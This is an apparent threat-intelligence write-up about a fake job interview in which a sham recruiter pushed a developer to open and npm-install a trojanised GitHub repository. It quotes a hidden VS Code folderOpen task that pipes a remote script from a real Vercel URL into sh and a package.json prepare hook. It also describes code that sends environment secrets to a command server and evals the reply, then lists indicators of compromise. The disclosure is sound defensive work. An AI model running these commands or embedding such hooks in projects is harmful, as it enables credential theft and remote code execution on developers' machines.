
In early September 2026, Jean-Jacques received a message on LinkedIn. Its author introduced himself as “Charlie Cook, GMS” and mentioned a project looking for skills. The details stayed vague: a few loosely strung keywords β artificial intelligence, blockchain, decentralized token economy. Several of them name things we build in earnest, and Jean-Jacques was curious: which product, for which market, with which strategy? He accepted a video call.
The call took place on Google Meet. The man on screen did not look like the photo of the profile that had booked the meeting: in his thirties, bald, of average build, European-looking, speaking perfect English. He did not introduce himself.
After five minutes, he sent the link to a GitHub repository, asked
Jean-Jacques whether he used VS Code, asked him to clone the repository, then to
run npm install.
Jean-Jacques refused to run anything before studying the code and the project, and wanted to know who he was talking to and what was expected of him: “Who are you?” The man hung up.
Soon after, “Charlie Cook”’s profile vanished from LinkedIn, and the conversation with it. The website the approach had claimed also disappeared. Jean-Jacques had not recorded the call, and regrets it.
Before any clone, the repository page was already piling up signals.

The repository page on 10 September 2026: 381 commits, a .vscode folder at the top of the list, no description and no star.
The banner. The README opens on an image stacking “AI POWERED”, “NFT” and
“PLAY. EARN. OWN. EVOLVE.”, above a paragraph running through Web3, AI,
blockchain, Play-to-Earn, NFT avatars and decentralized token economy.
Further down: “Staking β’ Sports Betting β’ Roulette β’ Lottery β’ Slot Game”. No
product is described. The file was not even renamed: its alt text is
ChatGPT Image Aug 26, 2026, 11_49_18 AM, and the C2PA manifest it carries
names the generator gpt-image 2.0 and an origin of trainedAlgorithmicMedia.
Generated at 11:49 according to its name, the image was committed to the
repository at 11:52 the same day.

The README banner, generated by ChatGPT on 26 August 2026 according to its own C2PA manifest.
The account. Altura-Hub21 was created on 20 August 2026: a single
repository, no followers, an empty profile. The repository dates from 7
September at 14:44, its last push from 14:54.
The history. The “381 Commits” give an impression of seriousness. The
oldest, though, go back to July 2015 and belong to an unrelated free-software
project, onto which a poker game was grafted, then the payload. The last pushes
come from a series of throwaway addresses, two of which contain the word
interview.
The name. An identical repository, Altura-Hub/Altura-MVP, had been
reported on the GitHub forum
and then deleted. It came back with a “21” added.
We read the repository without running anything: a mirror clone, with no working
copy, each file extracted with git show. Two doors were waiting there, one for
each answer to “do you use VS Code?”.
.vscode/tasks.jsonTwo tasks marked "runOn": "folderOpen", which the editor runs when the folder
is opened. The first runs npm install. The second downloads a script and hands
it to the shell:
"linux": { [several hundred spaces] "command": "wget -qO- 'https://earniverse-mvp.vercel.app/api/settings/linux' | sh"
The spaces push the command off-screen, on GitHub as in an editor. The display
settings ("reveal": "silent", "echo": false, "close": true) do the rest:
no terminal appears.
The script this address serves β fetched on 10 September 2026, never run β is
fourteen lines long. It prints “Authenticated”, downloads a second script it
places under ~/.vscode/vscode-bootstrap.sh, a folder every VS Code user
already owns, starts it in the background with nohup, and clears the terminal
after each step.
These scripts are served only to command-line clients. When we asked the Wayback
Machine to archive the next stage, the server answered it with 403, and a page
branded “Celestium Exchange” announcing a filter by IP address and user agent,
accepting only “curl / terminal-based requests”. An archiving or analysis
service is therefore likely to see only a closed door.
Fetched afterwards over the Tor network, that next stage is a 268-line shell script that prepares and launches the payload proper:
~/.vscode/;sam.js file and a package.json from the same server,
installs their dependencies with npm, then runs sam.js.We stopped there: sam.js, the payload itself, was not downloaded.
VS Code runs these tasks only with the user’s agreement: trusted folder, automatic tasks allowed. So the victim has to click β and that is what a live interlocutor is for.
npm installThe package.json declares:
"prepare": "start /b node server || nohup node server &"
npm install runs the prepare script, which starts the project’s server in
the background. That server loads its routes, among them routes/api/auth.js.
At the end of that file, on the same line as module.exports = router; and
behind several hundred spaces, obfuscated code which, once decoded:
process.env: tokens, API keys, credentials);http://91.121.235.127:1224/api/checkStatus;eval, whatever the server returns when it answers
status: "error": remote code execution disguised as error handling;Running npm install, as asked, was enough.
The approach claimed to come from the company PureLogics. One does exist, and is
quite real: purelogics.com, founded in 2006, several hundred employees, based
in Lahore. Nothing ties it to this affair.
The LinkedIn page put forward is another one: purelogicsofficial. To the name
of a company that is not that one, “official” has been added. The page announces
11 to 50 employees, 3 associated members, a founding in 2020, a Pakistani mobile
number and the site purelogics.co.
The history of that domain is puzzling:
| Date | Finding |
|---|---|
| April 2023 | redirected to GoDaddy: the domain is for sale |
| late 2024 | back in service |
| February 2025, May 2026 | Web archives: an “Under Maintenance” page |
| 3 September 2026 | Jean-Jacques views the site: a WordPress built on Axtra , a commercial theme for creative agencies, served over HTTPS |
| 10 September 2026 | the host’s default page, no TLS certificate any more |
Jean-Jacques’s browser cache keeps a trace of his 3 September visit: 35 resources from the theme and its plugins. The home page itself was, alas, overwritten by the 10 September visit.
A single account remains attached to the page: that of a freelancer from Lahore, “CEO” of PureLogics since April 2023 β the very month the domain was for sale. Nothing ties him directly to the approach, and we do not name him.
On LinkedIn, anyone can declare themselves an employee of any company page: that attachment proves nothing on its own. But a name borrowed from a company of several hundred people and padded with “official”, a mobile number, a site sometimes online and sometimes gone: the whole is suspicious to say the least.
Port 1224, path /api/checkStatus, eval on an error reply, second stage
hosted on Vercel, a VS Code folderOpen task, a crypto lure and a fake
recruiter: this is the signature of the Contagious Interview campaign, which
Microsoft
,
Elastic
and Kudelski Security
attribute to North Korea.
This repository has served it since at least August 2025. Its command server
changed eight times between June and August 2026, and each wave got its own
Vercel app (vscode-settings-0511, vscode-settings-529,
vscode-settings-0618β¦), after other pretexts (0g-auth-check, oracle-v3-nu).
The face on the call did not match the profile photo. Nothing new there either: an investigation by Indicator describes a North Korean operation of the same kind, which unknowingly recruited freelancers in the Philippines, Nigeria, Colombia and Bangladesh to conduct the video interviews. A video call shows a face; it does not say who it works for.
It all stopped on a refusal and a question: run nothing during the call, not even
npm install, and ask the interlocutor who he was.
Nothing, in the channel the scammer chose, could answer in his place. A LinkedIn profile is self-declared and erased in one click. A company page accepts any employee who declares themselves. A face on screen may belong to a middleman. And the repository’s commits were signed by no one.
This is the missing layer: an identity that others have certified, and signed commits that point back to it. It does not make code harmless β a scammer can sign. It makes its author nameable from one platform to the next, and accountable for what they publish.
During this investigation, Jean-Jacques did in fact run, without reading it, a small program I had sent him to sift through his Firefox cache. He knew who had written it, and the email that carried it was signed.
.vscode/, the preinstall, install,
postinstall and prepare scripts of the package.json, and the identity of
the last contributors.npm config set ignore-scripts true.Collected on 10 September 2026. The email addresses are those the commits declare; they may have been spoofed.
GitHub repositories
github.com/Altura-Hub21/Altura-MVP β online; last commit
3db2431792c93882c2c4df7e336e43fe1d4765dfgithub.com/Altura-Hub/Altura-MVP β deletedLater stages β https://<app>.vercel.app/api/settings/linux
(and /mac, /windows)
earniverse-mvp, vscode-settings-8140-self, vscode-settings-0618,
vscode-settings-529, vscode-settings-0511β¦/api/validate?token=β¦: 0g-auth-check, oracle-v3-nu,
oracle-reg-checkearniverse-mvp served on 10 September 2026: SHA-256
7cb1a0affb37850270bcf9135c56dd9e0d40f567765f100e38990c0021edc143https://earniverse-mvp.vercel.app/api/settings/bootstraplinux,
placed under ~/.vscode/vscode-bootstrap.sh and started by nohupHTTP 403, [SECURITY MODE: CLI_ONLY / IP_VALIDATION_ENABLED]0c0d094d6882589462a1333bb35dc363904eeb88b640f7c32e41356ea847f3ebhttps://earniverse-mvp.vercel.app/api/settings/env
(saved as ~/.vscode/sam.js) and
https://earniverse-mvp.vercel.app/api/settings/package (as
~/.vscode/package.json)On an affected machine β under ~/.vscode/: vscode-bootstrap.sh, a
portable Node.js node-v24.11.1-<os>-<arch>/, sam.js, package.json and
node_modules/
Command servers β http://<address>:1224/api/checkStatus
| Address | First seen in the repository | Network (RDAP) |
|---|---|---|
91.121.235.127 | 27 August 2026 | OVH, France |
141.94.148.35 | 25 August 2026 | OVH, France |
141.94.148.39 | 14 August 2026 | OVH, France |
54.39.43.114 | 4 August 2026 | OVH customer block |
167.114.215.75 | 28 July 2026 | OVH customer block |
54.39.43.117 | 16 July 2026 | OVH customer block |
147.124.212.207 | 22 June 2026 | Majestic Hosting Solutions |
147.124.212.180 | 15 June 2026 | Majestic Hosting Solutions |
Addresses of the commits carrying the payload
earniverse.interview+1@gmail.com interview.xaya.io@gmail.com
everdreamsoft2010@gmail.com owdilqnebbrnpkeamkanibk@st.hmahs.org
griffinliamsku276@outlook.com lxin6793@gmail.com
aaronhiroto.bm@gmail.com coinstar@gmail.com
Request marker β tid=bm93IGl0IHRpbWUgdG8gZ2V0IGV2ZXJ5dGhpbmc=
LinkedIn β profile “Charlie Cook, GMS” (deleted); page
linkedin.com/company/purelogicsofficial
Domain β purelogics.co: 2.57.91.91, name servers dns-parking.com,
mail mx1.hostinger.pk. On 3 September 2026: WordPress, axtra theme (plugins
axtra-essential, wcf-addons, wcf-addons-pro), Elementor 4.2.2, served over
HTTP/2 on TLS
Banner β C2PA manifest gpt-image 2.0, c2pa.created on 26 August 2026
If you have been approached by the same profiles, or if you are continuing the investigation, you can contact us .